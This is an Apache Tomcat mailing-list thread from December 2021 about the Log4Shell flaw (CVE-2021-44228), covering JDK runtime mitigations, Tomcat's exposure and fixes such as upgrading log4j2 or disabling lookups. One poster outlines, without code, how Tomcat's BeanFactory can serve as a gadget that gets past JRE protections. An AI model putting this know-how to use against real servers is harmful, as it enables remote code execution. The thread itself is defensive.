>> Suspecting that someone here knows the answer immediately, I thought 
>> I’d ask.
>>
>> If you do not know the answer, please don’t spend any time
>> investigating: I’ll do that later today and update everyone whether 
>> or not I find an answer.
>>
>> Our security team advise that “Certain versions of the Java 
>> Development Kit remove the LDAP attack vector”.
>>
>> My question is: Does this removal occur during compile time or runtime?
>
> Runtime. You can even re-enable the vulnerability if you want :)
>
> It's worth repeating what David Weisgerber said in his reply: even if 
> the runtime JDK/JRE provides a mitigation of sorts, you may still be 
> vulnerable through other means (aka "JNDI gadgets").
>
> There is also a risk of information leakage which does NOT rely on the 
> use of LDAP connections.
>
> Your best course of action would be to upgrade log4j if possible, or 
> use one of the several other mitigations available for recent 
> versions. If you aren't running a recent version, RUN ONE.
>
> -chris
>
> -
> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
> For additional commands, e-mail: users-h...@tomcat.apache.org

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: CVE-2021-44228 Log4j 2 Vulnerability - Runtime vs compile time Java version

[Sebastian Hennebrüder]

There have been multiple Patches for RMI and LDAP over time in Java. 

The first article states which attack (from the one the researcher analyzed) 
was possible in which version.

https://www.veracode.com/blog/research/exploiting-jndi-injections-java

https://github.com/mbechler/marshalsec/

If the system is not explicitly configured to allow remote class loading via 
RMI from everywhere, the only successful attack (= run code on the server), I 
found, is leveraging the BeanFactory of Tomcat. The latter is working with any 
recent Tomcat and Java.

I understand Mark’s point that this is  caused by use of log4j and not by 
Tomcat on the other hand it would be way harder to leverage the attack, if the 
BeanFactory could be modified.






> Am 13.12.2021 um 16:03 schrieb Juri Berlanda :
> 
> Hi,
> 
> we were affected - we use an AccessLogValve, which logs to Log4j2 and we use 
> Log4j as java.util.logging LogManager. We already patched, but only on 
> Saturday.
> 
> In any case: in a lot of places I saw "recent JRE versions have a mitigation 
> in place", but I can't seem to find which JRE version introduced which 
> mitigation. Can anybody here point me to where I can find that information? 
> Googling for this only seems to bring up everybody's security advisories, but 
> nobody seems to bother to state exact JRE versions.
> 
> Cheers,
> 
> Juri
> 
> On 12/13/21 2:13 PM, Christopher Schultz wrote:
>> Tim,
>> 
>> Adding to what others have posted...
>> 
>> On 12/13/21 03:57, Scott,Tim wrote:
>>> Suspecting that someone here knows the answer immediately, I thought I’d 
>>> ask.
>>> 
>>> If you do not know the answer, please don’t spend any time investigating: 
>>> I’ll do that later today and update everyone whether or not I find an 
>>> answer.
>>> 
>>> Our security team advise that “Certain versions of the Java Development Kit 
>>> remove the LDAP attack vector”.
>>> 
>>> My question is: Does this removal occur during compile time or runtime?
>> 
>> Runtime. You can even re-enable the vulnerability if you want :)
>> 
>> It's worth repeating what David Weisgerber said in his reply: even if the 
>> runtime JDK/JRE provides a mitigation of sorts, you may still be vulnerable 
>> through other means (aka "JNDI gadgets").
>> 
>> There is also a risk of information leakage which does NOT rely on the use 
>> of LDAP connections.
>> 
>> Your best course of action would be to upgrade log4j if possible, or use one 
>> of the several other mitigations available for recent versions. If you 
>> aren't running a recent version, RUN ONE.
>> 
>> -chris
>> 
>> -
>> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
>> For additional commands, e-mail: users-h...@tomcat.apache.org
> 
> -
> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
> For additional commands, e-mail: users-h...@tomcat.apache.org
> 


-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: CVE-2021-44228 Log4j 2 Vulnerability - Runtime vs compile time Java version

[Juri Berlanda]

Hi,

we were affected - we use an AccessLogValve, which logs to Log4j2 and we 
use Log4j as java.util.logging LogManager. We already patched, but only 
on Saturday.


In any case: in a lot of places I saw "recent JRE versions have a 
mitigation in place", but I can't seem to find which JRE version 
introduced which mitigation. Can anybody here point me to where I can 
find that information? Googling for this only seems to bring up 
everybody's security advisories, but nobody seems to bother to state 
exact JRE versions.


Cheers,

Juri

On 12/13/21 2:13 PM, Christopher Schultz wrote:

Tim,

Adding to what others have posted...

On 12/13/21 03:57, Scott,Tim wrote:
Suspecting that someone here knows the answer immediately, I thought 
I’d ask.


If you do not know the answer, please don’t spend any time 
investigating: I’ll do that later today and update everyone whether 
or not I find an answer.


Our security team advise that “Certain versions of the Java 
Development Kit remove the LDAP attack vector”.


My question is: Does this removal occur during compile time or runtime?


Runtime. You can even re-enable the vulnerability if you want :)

It's worth repeating what David Weisgerber said in his reply: even if 
the runtime JDK/JRE provides a mitigation of sorts, you may still be 
vulnerable through other means (aka "JNDI gadgets").


There is also a risk of information leakage which does NOT rely on the 
use of LDAP connections.


Your best course of action would be to upgrade log4j if possible, or 
use one of the several other mitigations available for recent 
versions. If you aren't running a recent version, RUN ONE.


-chris

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org


-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

RE: [External] Re: CVE-2021-44228 Log4j 2 Vulnerability - Runtime vs compile time Java version

[Scott,Tim]

HI Mark,

Thank you. That clarifies something I was not quite getting.

Surely setting a system property “log4j2.formatMsgNoLookups” does not require a 
particular JRE version?
And no, it doesn’t.

Yes – we’d need to upgrade log4j2 and/or add that parameter. Whilst the JRE 
version might deliver some protection, it’s not everything.

Thanks,
Tim

--
Tim Scott
OCLC · Senior Software Engineer / Technical Product Manager

cc: Product Management file

OCLC COVID-19 resources: 
oc.lc/covid19-service-info<https://oc.lc/covid19-service-info>

From: Mark Thomas 
Sent: 13 December 2021 09:36
To: users@tomcat.apache.org
Subject: [External] Re: CVE-2021-44228 Log4j 2 Vulnerability - Runtime vs 
compile time Java version

On 13/12/2021 09:21, David Weisgerber wrote:
> Hi,
> as far as I read through the details, it is a runtime option of the JRE. So, 
> it does not need any recompilation.
> However, some websites pointed out that if you are using Tomcat you could 
> bypass the JRE protection.

Correct, it is the runtime version of the JRE that matters.

It is also correct that using the latest JDK is *not* sufficient to
protect against this issue.

Depending on what classes are on the class path, it may be possible to
trigger an LDAP call to a malicious LDAP server that, with a specially
crafted response, can trigger code execution. Tomcat includes at least
one such collection of classes by default so you should *not* rely on
just updating the JRE.

You need to update log4j2 to a version that disables JNDI lookups by
default or ensure you are using a sufficiently recent version of log4j2
that has the option to disable JNDI lookups and ensure that you have
configured it so JNDI lookups are disabled.

It is pretty much a certainty that there will be other combinations of
libraries that this exploit can leverage so, whether you are running on
Tomcat or not, my recommendation would be to ensure that you address
this issue with the log4j2 update or configuration.

Mark


>
> Best regards,
> David
>
> From: Scott,Tim mailto:tim.sc...@oclc.org>>
> Sent: Monday, 13 December 2021 09:57
> To: users@tomcat.apache.org<mailto:users@tomcat.apache.org>
> Subject: CVE-2021-44228 Log4j 2 Vulnerability - Runtime vs compile time Java 
> version
>
> Hi all,
>
> Suspecting that someone here knows the answer immediately, I thought I’d ask.
>
> If you do not know the answer, please don’t spend any time investigating: 
> I’ll do that later today and update everyone whether or not I find an answer.
>
> Our security team advise that “Certain versions of the Java Development Kit 
> remove the LDAP attack vector”.
>
> My question is: Does this removal occur during compile time or runtime?
>
> i.e.: Do we need to build the .war file with a JDK which removes the LDAP 
> attack vector, or is it sufficient to deploy the Tomcat with a JDK which does 
> this?
>
> Thank you,
> Tim
>
> --
>
> Tim Scott
>
> OCLC · Senior Software Engineer / Technical Product Manager
>
> CityGate, 8 St. Mary’s Gate, Sheffield S1 4LW, UK
>
>
> cc: Product Management file
>
>
> OCLC COVID-19 resources: 
> oc.lc/covid19-service-info<http://oc.lc/covid19-service-info><https://oc.lc/covid19-service-info<https://oc.lc/covid19-service-info>>
> [COVID-19: We’re in this 
> together]<https://www.oclc.org/en/covid-19.html?utm_campaign=covid-19-support_medium=email_source=libraryservices_content=signature-banner-covid-19-information-resources<https://www.oclc.org/en/covid-19.html?utm_campaign=covid-19-support_medium=email_source=libraryservices_content=signature-banner-covid-19-information-resources>>
>


-
To unsubscribe, e-mail: 
users-unsubscr...@tomcat.apache.org<mailto:users-unsubscr...@tomcat.apache.org>
For additional commands, e-mail: 
users-h...@tomcat.apache.org<mailto:users-h...@tomcat.apache.org>

Re: CVE-2021-44228 Log4j 2 Vulnerability - Runtime vs compile time Java version

[Christopher Schultz]

Tim,

Adding to what others have posted...

On 12/13/21 03:57, Scott,Tim wrote:
Suspecting that someone here knows the answer immediately, I thought I’d 
ask.


If you do not know the answer, please don’t spend any time 
investigating: I’ll do that later today and update everyone whether or 
not I find an answer.


Our security team advise that “Certain versions of the Java Development 
Kit remove the LDAP attack vector”.


My question is: Does this removal occur during compile time or runtime?


Runtime. You can even re-enable the vulnerability if you want :)

It's worth repeating what David Weisgerber said in his reply: even if 
the runtime JDK/JRE provides a mitigation of sorts, you may still be 
vulnerable through other means (aka "JNDI gadgets").


There is also a risk of information leakage which does NOT rely on the 
use of LDAP connections.


Your best course of action would be to upgrade log4j if possible, or use 
one of the several other mitigations available for recent versions. If 
you aren't running a recent version, RUN ONE.


-chris

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect Tomcat?

[Mark Thomas]

On 13/12/2021 07:41, Saurav Sarkar wrote:

Hi All,

How does tomcat access valves/logs work ?


This is open source. You can look at the source code.


Since it prints the whole URL , will it be any issue if the access logs are
using Log4j2 implementation?


Again (with a minor update to the log4j 1.x information).

Currently supported Tomcat versions (8.5.x, 9.0.x, 10.0.x and 10.1.x) 
have no dependency on log4j.


Applications may have a dependency on log4j. You should seek support 
from your application vendors on how best to address this vulnerability 
although disabling the vulnerable feature is likely to be the simplest 
solution.


Tomcat 8.0.x and earlier as well as the first few releases of 8.5.x 
provided optional support for switching Tomcat's internal logging to 
log4j 1.x. Anyone one using these very old (5+ years), unsupported 
versions that switched to using log4j 1.x is may need to address this 
vulnerability as log4j 1.x is affected in some (probably rarely used) 
configurations. Regardless, they'll need to address the Tomcat 
vulnerabilities that have been made public in those 5+ years.


It is possible to configure Tomcat to use log4j 2.x for its internal 
logging. This requires explicit configuration and the addition of the 
log4j 2.x library. Anyone who has switched Tomcat's internal logging to 
log4j 2.x is likely to need to address this vulnerability. Again, 
disabling the vulnerable feature is likely to be the simplest solution.


As Jon McAlexander has pointed out, adding the following to 
CATALINA_OPTS in setenv.sh / setenv.bat will disable the problematic feature


-Dlog4j2.formatMsgNoLookups=true

provided you are using a sufficiently recent version of log4j 2.x that 
supports that configuration option.


Mark





Best Regards,
Saurav

On Sun, Dec 12, 2021 at 7:32 PM Christopher Schultz <
ch...@christopherschultz.net> wrote:


Mark,

On 12/11/21 18:39, Mark Thomas wrote:

On 11/12/2021 22:04, Sebastian Hennebrüder wrote:

Hi all,

I reproduced the attack against Tomcat 9.0.56 with latest Java 8 and
Java 11. Actually the Java path version is not relevant.


Utter nonsense. Tomcat is not vulnerable to this attack.


It is possible with a deployed Tomcat 9 and Spring Boot with Tomcat
embedded.


The above statement fails to make clear that it is only true if a number
of of pre-conditions are also true.

The Spring team have a blog that describes the vulnerable configurations
and provides several possible workarounds:

https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot


If your server can reach arbitrary servers on the Internet, you can
execute random code in the shell.


The above statement fails to make clear that it is only true if a number
of of pre-conditions are also true.


The attack is not using RMI remote class loading but uses Tomcats
BeanFactory to create an ELExpression library. As the BeanFactory has
features to manipulate instantiated classes, it can inject a Script.
In plain Java application this would still be blocked by RMI class
loading but Tomcat circumvents this.


More mis-leading nonsense attempting to suggest that Tomcat is
vulnerable. It isn't.


The attack is explained in 2019 by
https://www.veracode.com/blog/research/exploiting-jndi-injections-java


What the authors of that blog make clear, but appears to have been
completely ignored by the person posting to this list is nicely summed
up at the end of the article:


The actual problem here is not within the JDK or Apache Tomcat library,
but rather in custom applications that pass user-controllable data to
the "InitialContext.lookup()" function, as it still represents a
security risk even in fully patched JDK installations.


Any application that takes any user provided data and uses it without
performing any validation and/or sanitization - particularly if that
data is then used to construct a request to an external service - is
probably going to create a security vulnerability in the application.


+1

*This* is what makes the log4j vulnerability such a problem: it takes
something that should be allowed to be untrustworthy (raw user input)
and turns it into logic signalling.

It is very easy to write an application that contains vulnerabilities.
Those vulnerabilities are NOT vulnerabilities in the hosting service, etc.

Anyone running a reasonably recent version of Java should *not* be
subject to RCE. Exfiltration of data available through JNDI (which /may/
be very interesting to attackers) is much more likely and much more
difficult to mitigate without either upgrading log4j or applying log4j's
mitigations (system property or format-modifier).

-chris

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org







-
To unsubscribe, e-mail: users-unsubscr...@t

Re: CVE-2021-44228 Log4j 2 Vulnerability - Runtime vs compile time Java version

[Mark Thomas]

On 13/12/2021 09:21, David Weisgerber wrote:

Hi,
as far as I read through the details, it is a runtime option of the JRE. So, it 
does not need any recompilation.
However, some websites pointed out that if you are using Tomcat you could 
bypass the JRE protection.


Correct, it is the runtime version of the JRE that matters.

It is also correct that using the latest JDK is *not* sufficient to 
protect against this issue.


Depending on what classes are on the class path, it may be possible to 
trigger an LDAP call to a malicious LDAP server that, with a specially 
crafted response, can trigger code execution. Tomcat includes at least 
one such collection of classes by default so you should *not* rely on 
just updating the JRE.


You need to update log4j2 to a version that disables JNDI lookups by 
default or ensure you are using a sufficiently recent version of log4j2 
that has the option to disable JNDI lookups and ensure that you have 
configured it so JNDI lookups are disabled.


It is pretty much a certainty that there will be other combinations of 
libraries that this exploit can leverage so, whether you are running on 
Tomcat or not, my recommendation would be to ensure that you address 
this issue with the log4j2 update or configuration.


Mark




Best regards,
David

From: Scott,Tim 
Sent: Monday, 13 December 2021 09:57
To: users@tomcat.apache.org
Subject: CVE-2021-44228 Log4j 2 Vulnerability - Runtime vs compile time Java 
version

Hi all,

Suspecting that someone here knows the answer immediately, I thought I’d ask.

If you do not know the answer, please don’t spend any time investigating: I’ll 
do that later today and update everyone whether or not I find an answer.

Our security team advise that “Certain versions of the Java Development Kit 
remove the LDAP attack vector”.

My question is: Does this removal occur during compile time or runtime?

i.e.: Do we need to build the .war file with a JDK which removes the LDAP 
attack vector, or is it sufficient to deploy the Tomcat with a JDK which does 
this?

Thank you,
Tim

--

Tim Scott

OCLC · Senior Software Engineer / Technical Product Manager

CityGate, 8 St. Mary’s Gate, Sheffield S1 4LW, UK


cc: Product Management file


OCLC COVID-19 resources: 
oc.lc/covid19-service-info<https://oc.lc/covid19-service-info>
[COVID-19: We’re in this 
together]<https://www.oclc.org/en/covid-19.html?utm_campaign=covid-19-support_medium=email_source=libraryservices_content=signature-banner-covid-19-information-resources>




-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

RE: CVE-2021-44228 Log4j 2 Vulnerability - Runtime vs compile time Java version

[David Weisgerber]

Hi,
as far as I read through the details, it is a runtime option of the JRE. So, it 
does not need any recompilation.
However, some websites pointed out that if you are using Tomcat you could 
bypass the JRE protection.

Best regards,
David

From: Scott,Tim 
Sent: Monday, 13 December 2021 09:57
To: users@tomcat.apache.org
Subject: CVE-2021-44228 Log4j 2 Vulnerability - Runtime vs compile time Java 
version

Hi all,

Suspecting that someone here knows the answer immediately, I thought I’d ask.

If you do not know the answer, please don’t spend any time investigating: I’ll 
do that later today and update everyone whether or not I find an answer.

Our security team advise that “Certain versions of the Java Development Kit 
remove the LDAP attack vector”.

My question is: Does this removal occur during compile time or runtime?

i.e.: Do we need to build the .war file with a JDK which removes the LDAP 
attack vector, or is it sufficient to deploy the Tomcat with a JDK which does 
this?

Thank you,
Tim

--

Tim Scott

OCLC · Senior Software Engineer / Technical Product Manager

CityGate, 8 St. Mary’s Gate, Sheffield S1 4LW, UK


cc: Product Management file


OCLC COVID-19 resources: 
oc.lc/covid19-service-info<https://oc.lc/covid19-service-info>
[COVID-19: We’re in this 
together]<https://www.oclc.org/en/covid-19.html?utm_campaign=covid-19-support_medium=email_source=libraryservices_content=signature-banner-covid-19-information-resources>

CVE-2021-44228 Log4j 2 Vulnerability - Runtime vs compile time Java version

[Scott,Tim]

Hi all,

Suspecting that someone here knows the answer immediately, I thought I'd ask.

If you do not know the answer, please don't spend any time investigating: I'll 
do that later today and update everyone whether or not I find an answer.

Our security team advise that "Certain versions of the Java Development Kit 
remove the LDAP attack vector".

My question is: Does this removal occur during compile time or runtime?

i.e.: Do we need to build the .war file with a JDK which removes the LDAP 
attack vector, or is it sufficient to deploy the Tomcat with a JDK which does 
this?

Thank you,
Tim

--
Tim Scott
OCLC * Senior Software Engineer / Technical Product Manager
CityGate, 8 St. Mary's Gate, Sheffield S1 4LW, UK

cc: Product Management file

OCLC COVID-19 resources: 
oc.lc/covid19-service-info
[COVID-19: We're in this 
together]

Re: CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect Tomcat?

[Saurav Sarkar]

Hi All,

How does tomcat access valves/logs work ?

Since it prints the whole URL , will it be any issue if the access logs are
using Log4j2 implementation?

Best Regards,
Saurav

On Sun, Dec 12, 2021 at 7:32 PM Christopher Schultz <
ch...@christopherschultz.net> wrote:

> Mark,
>
> On 12/11/21 18:39, Mark Thomas wrote:
> > On 11/12/2021 22:04, Sebastian Hennebrüder wrote:
> >> Hi all,
> >>
> >> I reproduced the attack against Tomcat 9.0.56 with latest Java 8 and
> >> Java 11. Actually the Java path version is not relevant.
> >
> > Utter nonsense. Tomcat is not vulnerable to this attack.
> >
> >> It is possible with a deployed Tomcat 9 and Spring Boot with Tomcat
> >> embedded.
> >
> > The above statement fails to make clear that it is only true if a number
> > of of pre-conditions are also true.
> >
> > The Spring team have a blog that describes the vulnerable configurations
> > and provides several possible workarounds:
> >
> > https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot
> >
> >> If your server can reach arbitrary servers on the Internet, you can
> >> execute random code in the shell.
> >
> > The above statement fails to make clear that it is only true if a number
> > of of pre-conditions are also true.
> >
> >> The attack is not using RMI remote class loading but uses Tomcats
> >> BeanFactory to create an ELExpression library. As the BeanFactory has
> >> features to manipulate instantiated classes, it can inject a Script.
> >> In plain Java application this would still be blocked by RMI class
> >> loading but Tomcat circumvents this.
> >
> > More mis-leading nonsense attempting to suggest that Tomcat is
> > vulnerable. It isn't.
> >
> >> The attack is explained in 2019 by
> >> https://www.veracode.com/blog/research/exploiting-jndi-injections-java
> >
> > What the authors of that blog make clear, but appears to have been
> > completely ignored by the person posting to this list is nicely summed
> > up at the end of the article:
> >
> > 
> > The actual problem here is not within the JDK or Apache Tomcat library,
> > but rather in custom applications that pass user-controllable data to
> > the "InitialContext.lookup()" function, as it still represents a
> > security risk even in fully patched JDK installations.
> > 
> >
> > Any application that takes any user provided data and uses it without
> > performing any validation and/or sanitization - particularly if that
> > data is then used to construct a request to an external service - is
> > probably going to create a security vulnerability in the application.
>
> +1
>
> *This* is what makes the log4j vulnerability such a problem: it takes
> something that should be allowed to be untrustworthy (raw user input)
> and turns it into logic signalling.
>
> It is very easy to write an application that contains vulnerabilities.
> Those vulnerabilities are NOT vulnerabilities in the hosting service, etc.
>
> Anyone running a reasonably recent version of Java should *not* be
> subject to RCE. Exfiltration of data available through JNDI (which /may/
> be very interesting to attackers) is much more likely and much more
> difficult to mitigate without either upgrading log4j or applying log4j's
> mitigations (system property or format-modifier).
>
> -chris
>
> -
> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
> For additional commands, e-mail: users-h...@tomcat.apache.org
>
>

Re: CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect Tomcat?

[Christopher Schultz]

Mark,

On 12/11/21 18:39, Mark Thomas wrote:

On 11/12/2021 22:04, Sebastian Hennebrüder wrote:

Hi all,

I reproduced the attack against Tomcat 9.0.56 with latest Java 8 and 
Java 11. Actually the Java path version is not relevant.


Utter nonsense. Tomcat is not vulnerable to this attack.

It is possible with a deployed Tomcat 9 and Spring Boot with Tomcat 
embedded.


The above statement fails to make clear that it is only true if a number 
of of pre-conditions are also true.


The Spring team have a blog that describes the vulnerable configurations 
and provides several possible workarounds:


https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot

If your server can reach arbitrary servers on the Internet, you can 
execute random code in the shell.


The above statement fails to make clear that it is only true if a number 
of of pre-conditions are also true.


The attack is not using RMI remote class loading but uses Tomcats 
BeanFactory to create an ELExpression library. As the BeanFactory has 
features to manipulate instantiated classes, it can inject a Script. 
In plain Java application this would still be blocked by RMI class 
loading but Tomcat circumvents this.


More mis-leading nonsense attempting to suggest that Tomcat is 
vulnerable. It isn't.


The attack is explained in 2019 by 
https://www.veracode.com/blog/research/exploiting-jndi-injections-java


What the authors of that blog make clear, but appears to have been 
completely ignored by the person posting to this list is nicely summed 
up at the end of the article:



The actual problem here is not within the JDK or Apache Tomcat library, 
but rather in custom applications that pass user-controllable data to 
the "InitialContext.lookup()" function, as it still represents a 
security risk even in fully patched JDK installations.



Any application that takes any user provided data and uses it without 
performing any validation and/or sanitization - particularly if that 
data is then used to construct a request to an external service - is 
probably going to create a security vulnerability in the application.


+1

*This* is what makes the log4j vulnerability such a problem: it takes 
something that should be allowed to be untrustworthy (raw user input) 
and turns it into logic signalling.


It is very easy to write an application that contains vulnerabilities. 
Those vulnerabilities are NOT vulnerabilities in the hosting service, etc.


Anyone running a reasonably recent version of Java should *not* be 
subject to RCE. Exfiltration of data available through JNDI (which /may/ 
be very interesting to attackers) is much more likely and much more 
difficult to mitigate without either upgrading log4j or applying log4j's 
mitigations (system property or format-modifier).


-chris

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect Tomcat?

[Rémy Maucherat]

On Sat, Dec 11, 2021 at 11:05 PM Sebastian Hennebrüder
 wrote:
>
> Hi all,
>
> I reproduced the attack against Tomcat 9.0.56 with latest Java 8 and Java 11. 
> Actually the Java path version is not relevant.
>
> It is possible with a deployed Tomcat 9 and Spring Boot with Tomcat embedded.
>
> If your server can reach arbitrary servers on the Internet, you can execute 
> random code in the shell.
>
> The attack is not using RMI remote class loading but uses Tomcats BeanFactory 
> to create an ELExpression library. As the BeanFactory has features to 
> manipulate instantiated classes, it can inject a Script. In plain Java 
> application this would still be blocked by RMI class loading but Tomcat 
> circumvents this.
>
> The attack is explained in 2019 by 
> https://www.veracode.com/blog/research/exploiting-jndi-injections-java

Also, another person already thought about digging this up (even
before we were aware of the log4j problem):
https://bz.apache.org/bugzilla/show_bug.cgi?id=65736

Rémy

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect Tomcat?

[Mark Thomas]

On 11/12/2021 22:04, Sebastian Hennebrüder wrote:

Hi all,

I reproduced the attack against Tomcat 9.0.56 with latest Java 8 and Java 11. 
Actually the Java path version is not relevant.


Utter nonsense. Tomcat is not vulnerable to this attack.


It is possible with a deployed Tomcat 9 and Spring Boot with Tomcat embedded.


The above statement fails to make clear that it is only true if a number 
of of pre-conditions are also true.


The Spring team have a blog that describes the vulnerable configurations 
and provides several possible workarounds:


https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot


If your server can reach arbitrary servers on the Internet, you can execute 
random code in the shell.


The above statement fails to make clear that it is only true if a number 
of of pre-conditions are also true.



The attack is not using RMI remote class loading but uses Tomcats BeanFactory 
to create an ELExpression library. As the BeanFactory has features to 
manipulate instantiated classes, it can inject a Script. In plain Java 
application this would still be blocked by RMI class loading but Tomcat 
circumvents this.


More mis-leading nonsense attempting to suggest that Tomcat is 
vulnerable. It isn't.



The attack is explained in 2019 by 
https://www.veracode.com/blog/research/exploiting-jndi-injections-java


What the authors of that blog make clear, but appears to have been 
completely ignored by the person posting to this list is nicely summed 
up at the end of the article:



The actual problem here is not within the JDK or Apache Tomcat library, 
but rather in custom applications that pass user-controllable data to 
the "InitialContext.lookup()" function, as it still represents a 
security risk even in fully patched JDK installations.



Any application that takes any user provided data and uses it without 
performing any validation and/or sanitization - particularly if that 
data is then used to construct a request to an external service - is 
probably going to create a security vulnerability in the application.


Mark

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect Tomcat?

[Sebastian Hennebrüder]

To be more precise. It depends on how you configure log4j. By default Spring 
boot installs 

org.apache.logging.log4j
log4j-to-slf4j


In that case the default NullConfiguration of Log4j is not executed and the 
JNDI lookup is not configured.

The chance to be impacted is smaller.

> Am 11.12.2021 um 23:35 schrieb Sebastian Hennebrüder :
> 
> Correction for Spring Boot with embedded Tomcat
> 
> The attack does not work by default.
> 
>> Am 11.12.2021 um 23:04 schrieb Sebastian Hennebrüder :
>> 
>> Hi all,
>> 
>> I reproduced the attack against Tomcat 9.0.56 with latest Java 8 and Java 
>> 11. Actually the Java path version is not relevant. 
>> 
>> It is possible with a deployed Tomcat 9 and Spring Boot with Tomcat embedded.
>> 
>> If your server can reach arbitrary servers on the Internet, you can execute 
>> random code in the shell.
>> 
>> The attack is not using RMI remote class loading but uses Tomcats 
>> BeanFactory to create an ELExpression library. As the BeanFactory has 
>> features to manipulate instantiated classes, it can inject a Script. In 
>> plain Java application this would still be blocked by RMI class loading but 
>> Tomcat circumvents this.
>> 
>> The attack is explained in 2019 by 
>> https://www.veracode.com/blog/research/exploiting-jndi-injections-java
>> 
>> 
>> Cheers 
>> 
>> Sebastian
> 
> 
> -
> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
> For additional commands, e-mail: users-h...@tomcat.apache.org
> 

Re: CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect Tomcat?

[Sebastian Hennebrüder]

> Am 11.12.2021 um 23:54 schrieb Aryeh Friedman :
> 
> On Sat, Dec 11, 2021 at 5:11 PM Sebastian Hennebrüder 
> wrote:
> 
>> Hi all,
>> 
>> I reproduced the attack against Tomcat 9.0.56 with latest Java 8 and Java
>> 11. Actually the Java path version is not relevant.
>> 
>> It is possible with a deployed Tomcat 9 and Spring Boot with Tomcat
>> embedded.
>> 
> 
> Does this affect pre-2.x log4j's? (I am using tomcat 9.0.35 with log4j
> 1.2.17)
> 
> 
> -- 
> Aryeh M. Friedman, Lead Developer, http://www.PetiteCloud.org

I did not validate this but it requires JNDI lookup, so following 
https://logging.apache.org/log4j/2.x/security.html 
<https://logging.apache.org/log4j/2.x/security.html> it is not affected.

Re: CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect Tomcat?

[Aryeh Friedman]

On Sat, Dec 11, 2021 at 5:11 PM Sebastian Hennebrüder 
wrote:

> Hi all,
>
> I reproduced the attack against Tomcat 9.0.56 with latest Java 8 and Java
> 11. Actually the Java path version is not relevant.
>
> It is possible with a deployed Tomcat 9 and Spring Boot with Tomcat
> embedded.
>

Does this affect pre-2.x log4j's? (I am using tomcat 9.0.35 with log4j
1.2.17)


-- 
Aryeh M. Friedman, Lead Developer, http://www.PetiteCloud.org

Re: CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect Tomcat?

[Sebastian Hennebrüder]

Correction for Spring Boot with embedded Tomcat

The attack does not work by default.

> Am 11.12.2021 um 23:04 schrieb Sebastian Hennebrüder :
> 
> Hi all,
> 
> I reproduced the attack against Tomcat 9.0.56 with latest Java 8 and Java 11. 
> Actually the Java path version is not relevant. 
> 
> It is possible with a deployed Tomcat 9 and Spring Boot with Tomcat embedded.
> 
> If your server can reach arbitrary servers on the Internet, you can execute 
> random code in the shell.
> 
> The attack is not using RMI remote class loading but uses Tomcats BeanFactory 
> to create an ELExpression library. As the BeanFactory has features to 
> manipulate instantiated classes, it can inject a Script. In plain Java 
> application this would still be blocked by RMI class loading but Tomcat 
> circumvents this.
> 
> The attack is explained in 2019 by 
> https://www.veracode.com/blog/research/exploiting-jndi-injections-java
> 
> 
> Cheers 
> 
> Sebastian


-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect Tomcat?

[Sebastian Hennebrüder]

Hi all,

I reproduced the attack against Tomcat 9.0.56 with latest Java 8 and Java 11. 
Actually the Java path version is not relevant. 

It is possible with a deployed Tomcat 9 and Spring Boot with Tomcat embedded.

If your server can reach arbitrary servers on the Internet, you can execute 
random code in the shell.

The attack is not using RMI remote class loading but uses Tomcats BeanFactory 
to create an ELExpression library. As the BeanFactory has features to 
manipulate instantiated classes, it can inject a Script. In plain Java 
application this would still be blocked by RMI class loading but Tomcat 
circumvents this.

The attack is explained in 2019 by 
https://www.veracode.com/blog/research/exploiting-jndi-injections-java


Cheers 

Sebastian

Re: CVE-2021-44228 Log4j 2 Vulnerability -- How does this affect Tomcat?

[Christopher Schultz]

All,

On 12/11/21 03:18, Mark Thomas wrote:

On 10/12/2021 22:17, James H. H. Lampert wrote:

A customer brought this to my attention:

https://www.randori.com/blog/cve-2021-44228/

I have no idea how (or if) Tomcat is affected. I have only the vaguest 
idea what this vulnerability even *is.*


Can anybody here shed any light?


Currently supported Tomcat versions (8.5.x, 9.0.x, 10.0.x and 10.1.x) 
have no dependency on log4j.


Applications may have a dependency on log4j. You should seek support 
from your application vendors on how best to address this vulnerability 
although disabling the vulnerable feature is likely to be the simplest 
solution.


Tomcat 8.0.x and earlier as well as the first few releases of 8.5.x 
provided optional support for switching Tomcat's internal logging to 
log4j 1.x. Anyone one using these very old (5+ years), unsupported 
